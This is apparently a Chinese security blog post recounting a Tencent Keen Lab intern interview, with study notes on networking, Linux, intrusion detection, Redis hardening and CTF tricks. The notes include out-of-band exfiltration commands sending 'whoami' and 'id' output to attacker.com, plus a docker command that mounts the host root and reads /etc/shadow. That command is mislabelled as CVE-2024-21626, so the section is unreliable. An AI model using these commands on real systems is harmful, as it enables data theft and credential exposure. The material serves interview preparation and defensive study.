安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
?騰訊[實習]科恩實驗室-安全工程師
一、網絡與協議
1. TCP三次握手
2. SYN掃描原理
3. HTTPS證書機制
二、滲透測試實戰
1. 完整滲透流程(以代碼審計為例)
2. 高階滲透案例:DNS重綁定攻擊
三、Linux系統深度
1. 進程與線程對比
2. 特殊進程問題修復
3. 文件監控與調試
四、防御與溯源(護網核心)
1. 入侵痕跡檢測矩陣
2. 自動化溯源框架
五、漏洞攻防進階
1. DNS帶外數據泄露
2. Redis未授權利用加固
3. Runc容器逃逸(CVE-2024-21626)
六、機器學習與算法
1. 惡意樣本分類
2. 萊文斯坦距離實戰
七、CTF技巧精要
1. 子域名收集工具鏈
2. 文件下載漏洞利用
?騰訊[實習]科恩實驗室-安全工程師
## 一面 時長:一個半小時1. tcp三次握手2. 介紹一次滲透測試過程- 講了一次代碼審計3. SSRF漏洞4. 內網滲透大致流程5. 再介紹一次難度比較高的滲透測試6. 防守方有哪些入侵檢測手段,有哪些痕跡是可以抓到的?7. 介紹進程和線程8. 進程和線程內存空間的關系9. 父子進程的介紹10. 孤兒進程和僵尸進程- 這個我講反掉了11. kill一個進程的時候,都發生了那些事情,從父子進程角度講12. 反彈shell的幾種方式- 本質是用tcp協議傳輸bash程序13. att&ck矩陣的類別,介紹其中的CC14. 到域名下拿到命令執行的結果- 這部分沒聽清楚,面試的時候直接說了不知道,復盤聽錄音還是沒怎么聽清,但好像大概想問的是DNS域名解析獲取命令執行回顯15. Linux命令通配符16. 護網的溯源、威脅分析工作之類的問了十分鐘左右- 完全不會,以后簡歷上再也不寫護網了17. xx攻防演練中防守方有哪些手段,問的比較雜,主要就是問入侵痕跡檢測和溯源之類的東西- 這部分也不太會18. SVM、KNN介紹19. 卷積神經網絡介紹20. 萊文斯坦距離21. 搜索引擎算法- 不太了解,大概講了下字典樹22. 倒排索引23. 惡意樣本給出函數家族的md5,如何進行分類- 從統計規律講了下24. 反問## 二面 時長:半小時1. 第一個問題就直接問了護網,和一面問的差不多,直接裂開2. Linux開機自啟動方式3. init.d腳本介紹4. Linux怎么查看程序調用了哪些文件5. 如何監控Linux文件操作- 問到這里就已經非常慌了,Linux比較進階的操作都不是很會,而且面試官一直在嘆氣我日6. Linux有哪些系統調用- 不會7. GDB調試- 不會8. 查看Linux開放的網絡端口、多線程狀態9. 反彈shell的方式10. Linux下怎么隱藏文件11. 子域名收集12. DNS重綁定13. DNS解析的流程14. CC流量- 聽都沒聽過15. ssh隧道- 面試沒聽清楚,聽到隧道就以為是UDP穿越隧道開講了16. https證書機制介紹17. burpsuite一些使用方法,插件開發方法18. nmap的基本操作19. syn開放鏈接原理20. redis漏洞利用21. runc容器逃逸原理22. 常見WAF種類(不知道為什么還特別問了長亭的WAF)23. MySQL的UAF- 沒聽過24. 算法題(比較簡單,leetcode easy級別)25. Linux進程通信26. 反問
一、網絡與協議
1. TCP三次握手
mermaid
sequenceDiagram Client->>Server: SYN=1, Seq=x Server-->>Client: SYN=1, ACK=1, Seq=y, Ack=x+1 Client->>Server: ACK=1, Seq=x+1, Ack=y+1
- 關鍵點:SYN洪水攻擊利用半連接耗盡資源,防御需啟用SYN Cookie
2. SYN掃描原理
bash
nmap -sS 目標IP # 發送SYN不回應ACK,繞過基礎日志
- 隱蔽性:不建立完整連接,被掃描主機僅見RST包
3. HTTPS證書機制
mermaid
graph LR A[客戶端請求] --> B[服務端發送證書] B --> C{客戶端驗證} C -->|有效| D[用證書公鑰加密會話密鑰] C -->|無效| E[終止連接]
二、滲透測試實戰
1. 完整滲透流程(以代碼審計為例)
mermaid
graph TB A[信息收集] --> B[白盒審計] B --> C[漏洞定位:SSRF/反序列化] C --> D[外帶數據:DNS泄露] D --> E[橫向移動:Redis未授權] E --> F[權限維持:systemd服務注入]
2. 高階滲透案例:DNS重綁定攻擊
場景:繞過SSRF防護
python
# 攻擊步驟 1. 注冊域名:evil.com (TTL=0) 2. 首次解析返回內網IP(如172.16.0.1) 3. 二次解析返回127.0.0.1 4. 利用時間差訪問內部服務
三、Linux系統深度
1. 進程與線程對比
特性 進程 線程 內存隔離 獨立地址空間 共享進程內存 通信成本 高(IPC機制) 低(全局變量) 容錯性 崩潰不影響其他進程 線程崩潰導致進程終止 2. 特殊進程問題修復
bash
# 僵尸進程清理 ps -ef | grep defunct # 定位僵尸PID kill -9 父進程ID # 強制回收資源 # 孤兒進程接管 systemctl status init # 確認init進程狀態
3. 文件監控與調試
監控文件操作:
bash
inotifywait -m -r /etc # 實時監控目錄 auditctl -a exit,always -F dir=/var/log -F perm=wa # 審計日志篡改
GDB調試核心命令:
bash
(gdb) break *0x400520 # 內存斷點 (gdb) x/20x $rsp # 查看棧數據 (gdb) p system # 打印函數地址
四、防御與溯源(護網核心)
1. 入侵痕跡檢測矩陣
攻擊階段 檢測手段 工具鏈 初始訪問 異常登錄地理定位 CrowdStrike/Elastic 持久化 開機自啟動項掃描 Autoruns/Lynis 橫向移動 內網ARP異常流量分析 Zeek/Arkime 數據外傳 DNS隧道特征檢測 Fiddler/Sigma規則 2. 自動化溯源框架
mermaid
graph LR A[告警觸發] --> B{日志關聯} B -->|WAF日志| C[提取攻擊IP] B -->|系統日志| D[定位進程行為] C --> E[威脅情報查詢] D --> F[進程樹重建] E & F --> G[生成攻擊鏈報告]
五、漏洞攻防進階
1. DNS帶外數據泄露
bash
# 外傳命令結果 curl http://$(whoami).attacker.com # HTTP泄露 dig `id | base64`.data.attacker.com # DNS泄露
2. Redis未授權利用加固
防御方案:
redis
requirepass Str0ngP@ss! # 強密碼認證 rename-command CONFIG "" # 禁用高危命令 bind 127.0.0.1 # 限制監聽地址
3. Runc容器逃逸(CVE-2024-21626)
原理:工作目錄未隔離 → 掛載宿主機根目錄
利用:bash
docker run --rm -it -v /:/host alpine chroot /host && cat /etc/shadow
六、機器學習與算法
1. 惡意樣本分類
處理流程:
mermaid
graph TB A[樣本集] --> B[提取API序列] B --> C[生成TF-IDF向量] C --> D[訓練SVM分類器] D --> E[混淆矩陣驗證]
2. 萊文斯坦距離實戰
python
def levenshtein(s1, s2): if len(s1) < len(s2): return levenshtein(s2, s1) if len(s2) == 0: return len(s1) prev = range(len(s2) + 1) for i, c1 in enumerate(s1): curr = [i + 1] for j, c2 in enumerate(s2): curr.append(min(prev[j+1]+1, curr[j]+1, prev[j]+(c1!=c2))) prev = curr return prev[-1]
七、CTF技巧精要
1. 子域名收集工具鏈
bash
subfinder -d target.com -silent | httpx -status-code # 快速存活檢測 waybackurls target.com | grep -E '\.js$' | uniq # 歷史JS文件挖掘
2. 文件下載漏洞利用
關鍵路徑:
text
Linux: /proc/self/cwd/flag.txt # 進程工作目錄 Windows: C:\Windows\Panther\setup.log # 安裝日志
特別警示:護網面試重點考察 攻擊鏈重構能力 與 防御體系設計思維,建議掌握以下實戰組合:
- 溯源:ELK+威脅情報平臺(如微步在線)
- 反制:高交互蜜罐(如HFish)
- 加固:CIS基準掃描+自動化補丁管理